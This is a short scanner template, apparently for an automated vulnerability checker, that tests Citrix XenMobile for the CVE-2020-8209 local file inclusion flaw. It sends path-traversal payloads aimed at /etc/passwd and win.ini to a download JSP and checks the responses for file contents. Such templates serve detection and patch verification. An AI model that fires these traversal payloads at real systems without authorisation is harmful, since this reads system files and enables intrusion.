id: citrix-xenmobile-lfi-cve-2020-8209
info:
  name: Xenmobile LFI CVE-2020-8209
  risk: High


params:
  - root: '{{.BaseURL}}'

variables:
  - file: |
      ../../../../../etc/passwd
      ../../../../../c:/windows/win.ini

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/jsp/help-sb-download.jsp?sbFileName={{.file}}
    headers:
    detections:
      - >-
        StringSearch("response", "root:") && StringSearch("response", "/bin/bash")
      - >-
        StatusCode() == 200 && StringSearch("body", "[extensions]") && StringSearch("body", "[fonts]")

references:
  - link: https://twitter.com/ptswarm/status/1328346259502018560/photo/1